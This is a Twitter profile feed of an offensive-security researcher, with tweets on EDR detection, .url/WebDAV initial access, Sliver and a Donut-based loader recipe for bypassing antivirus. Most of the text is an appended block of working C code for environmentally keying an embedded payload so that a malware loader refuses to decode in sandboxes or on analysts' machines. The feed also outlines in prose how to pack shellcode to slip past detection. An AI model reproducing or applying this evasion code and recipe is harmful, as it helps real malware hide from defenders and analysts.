an0n

@an0n_r0

Followers: 13K | Following: 10K | Statuses: 2K

CRT(E|O|L) | OSCP | @RingZer0_CTF 1st (for 2yrs) | HackTheBox Top10 | RPISEC MBE | Flare-On completer | GoogleCTF writeup winner | SSD research | Math MSc |🇭🇺

Joined October 2018
an0n (@an0n_r0), 24 days ago:
RT @malmoeb: New blog post: Tear Down The Castle - Part 1 I analyzed 250 PingCastle Reports, grouping the findings…
an0n (@an0n_r0), 1 month ago:
EDRs in 2025 are going crazy. This helloworld was flagged by machine learning detections as dangerous high confidence malware right now. Ok, I understand they are afraid of non-console C code apps cross-compiled using MinGW, but what models are they using anyway? :)
[attached image]
an0n (@an0n_r0), 1 month ago:
RT @_dirkjan: Few BloodHound python updates: LDAP channel binding is now supported with Kerberos auth (native) or with NTLM (custom ldap3 v…
an0n (@an0n_r0), 1 month ago:
RT @Synacktiv: You can now use LDAP/LDAPs protocols with the SOCKS proxy of ntlmrelayx thanks to the PR from @b1two_ (now merged upstream).…
an0n (@an0n_r0), 1 month ago:
@Theonly_Hoff Of course. And I just came across this now: the 1st feature added is stopping go-donut from bypassing AMSI by default ;)
an0n (@an0n_r0), 1 month ago:
OK, tbh, if you want to do some nasty post-ex stuff like using the priv/kiwi module etc., don't expect it to fly under the radar unless you use advanced evasion techniques.
an0n (@an0n_r0), 1 month ago:
This is why I made minor add-ons to the awesome steganography PoC tool by @zcollinsdev:
an0n (@an0n_r0), 1 month ago:
@Avasea11 Yep, it is huge: ~15 MB.
an0n (@an0n_r0), 2 months ago:
RT @michael_eder_: NFS has not received much attention of the offensive security community in nearly a decade. Today, we are happy to share…
an0n (@an0n_r0), 2 months ago:
If interested in current initial access techniques (like this .url one), I would highly recommend the slides from the "Breach the Gates" presentation given by @EmericNasi at the @TheOffensiveX con this year; the slides are here:
Quoted tweet, Offensive X (@TheOffensiveX), 8 months ago:
🎤 Taking the stage now at Offensive X, we welcome Emeric Nasi with his talk on "Advanced Initial Access Craft in 2024." #OffensiveX2024 #CyberSecurity #redteam
[attached image]
an0n (@an0n_r0), 2 months ago:
And one more note: please don't overhype this. ;)
1.) The .url initial payload w/ WebDAV is not a new technique.
2.) This was tested here against only basic Defender.
3.) Running Sliver is nice, but it is not a total victory. Even if it is running, post-ex tasks could be caught.
an0n (@an0n_r0), 2 months ago:
Answering some questions: here are the two popups. Of course these lower the success rate of an attacker, but not too much. These popups can be passed with trivial clicks (Open + Run); it is not hidden, and there is no need to do some multi-step activity like SmartScreen's "More info".
[attached image 1]
[attached image 2]
an0n (@an0n_r0), 2 months ago:
@ShitSecure Yes, we had MotW, propagated through the zip extraction, but in the end it allowed me to execute the malicious .url file (only a basic warning popup was raised). And I think SmartScreen was enabled (left everything on defaults, tested on a Win10 + Win11 install also).
[attached image 1]
[attached image 2]
an0n (@an0n_r0), 2 months ago:
Fix try #2 (success!) in a nutshell:
- apply Donut on the EXE payload manually w/o AMSI bypass to get a shellcode loading the PE.
- pack the encoded shellcode inside a basic custom loader as an embedded resource (no need to use staging).
- no adv evasions, only some keying.
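The post above describes the procedure only in outline ("pack the encoded shellcode ... as an embedded resource", "only some keying"). The following is an added example of the keying step, written for this page; it is not the author's loader and not Donut or Sliver code. It assumes the embedded resource is stood in for by a byte array, that the keying material is the expected target hostname (a domain name or any other environmental value works the same way), and that the encoded blob carries a short header so the loader can tell a wrong key apart from a valid decode before it touches the payload bytes. The "payload" is constructed sample bytes, nothing is executed, and the Windows resource and execution APIs are deliberately left out so the block compiles anywhere.

```c
/*
 * Added example: environmental keying of an embedded payload blob.
 * Not the original author's code. Assumptions: keying material = expected
 * hostname; blob = [4-byte magic][4-byte len][payload] XORed with a
 * hostname-derived keystream; the static array stands in for a Windows
 * embedded resource; the sample payload is constructed bytes, not shellcode.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAGIC 0x4B455944u   /* "KEYD": a wrong key almost never decodes to this */

/* FNV-1a 64-bit hash over the keying material (hostname, domain, ...). */
static uint64_t fnv1a64(const char *s) {
    uint64_t h = 1469598103934665603ULL;
    for (; *s; s++) { h ^= (unsigned char)*s; h *= 1099511628211ULL; }
    return h;
}

/* Keystream byte i: a mixed 64-bit word per 8-byte block, so the stream
   does not simply repeat the seed. Not a cryptographic PRF; keying here is
   about tying the blob to one environment, not about confidentiality. */
static uint8_t ks_byte(uint64_t seed, size_t i) {
    uint64_t x = seed ^ ((uint64_t)(i / 8) * 0x9E3779B97F4A7C15ULL);
    x ^= x >> 33; x *= 0xff51afd7ed558ccdULL;
    x ^= x >> 33; x *= 0xc4ceb9fe1a85ec53ULL;
    x ^= x >> 33;
    return (uint8_t)(x >> (8 * (i % 8)));
}

/* Build the blob for the expected host. Returns bytes written, 0 if out is too small. */
size_t keyed_pack(const uint8_t *payload, uint32_t len, const char *host,
                  uint8_t *out, size_t outcap) {
    size_t total = 8 + (size_t)len;
    if (outcap < total) return 0;
    uint64_t seed = fnv1a64(host);
    uint8_t hdr[8] = {
        (uint8_t)(MAGIC >> 24), (uint8_t)(MAGIC >> 16), (uint8_t)(MAGIC >> 8), (uint8_t)MAGIC,
        (uint8_t)(len >> 24),   (uint8_t)(len >> 16),   (uint8_t)(len >> 8),   (uint8_t)len
    };
    for (size_t i = 0; i < 8; i++)   out[i]     = hdr[i]     ^ ks_byte(seed, i);
    for (size_t i = 0; i < len; i++) out[8 + i] = payload[i] ^ ks_byte(seed, 8 + i);
    return total;
}

/* Loader side: derive the key from the host we are actually running on.
   0 = decoded (out/outlen filled); -1 = header mismatch, i.e. wrong host, so
   the payload bytes are never decoded; -2 = malformed or truncated blob. */
int keyed_unpack(const uint8_t *blob, size_t n, const char *host,
                 uint8_t *out, size_t outcap, size_t *outlen) {
    if (n < 8) return -2;
    uint64_t seed = fnv1a64(host);
    uint8_t h[8];
    for (size_t i = 0; i < 8; i++) h[i] = blob[i] ^ ks_byte(seed, i);
    uint32_t magic = ((uint32_t)h[0] << 24) | ((uint32_t)h[1] << 16) | ((uint32_t)h[2] << 8) | h[3];
    uint32_t len   = ((uint32_t)h[4] << 24) | ((uint32_t)h[5] << 16) | ((uint32_t)h[6] << 8) | h[7];
    if (magic != MAGIC) return -1;
    if (len > n - 8 || len > outcap) return -2;
    for (size_t i = 0; i < len; i++) out[i] = blob[8 + i] ^ ks_byte(seed, 8 + i);
    *outlen = len;
    return 0;
}

/* Pack for pack_host, then "run" on run_host. 1 = payload recovered intact,
   0 = loader refused (wrong host), -1 = anything else (a bug). */
int roundtrip(const char *pack_host, const char *run_host) {
    static const uint8_t sample[] = "constructed sample payload, not shellcode";
    uint8_t blob[64], back[64];
    size_t got = 0;
    size_t n = keyed_pack(sample, (uint32_t)sizeof sample, pack_host, blob, sizeof blob);
    if (n == 0) return -1;
    int rc = keyed_unpack(blob, n, run_host, back, sizeof back, &got);
    if (rc == -1) return 0;
    if (rc != 0 || got != sizeof sample || memcmp(back, sample, got) != 0) return -1;
    return 1;
}

int main(void) {
    printf("same host:  %d (1 = decoded)\n", roundtrip("CORP-WS01", "CORP-WS01"));
    printf("other host: %d (0 = refused)\n", roundtrip("CORP-WS01", "ANALYST-VM"));
    return 0;
}
```

On a real target the hostname would come from gethostname()/GetComputerNameA() and the blob from the resource section; the point of the magic check is that a sandbox or analyst box with a different name gets a clean refusal rather than a crash on garbage bytes, which is the behaviour that makes keying useful at all.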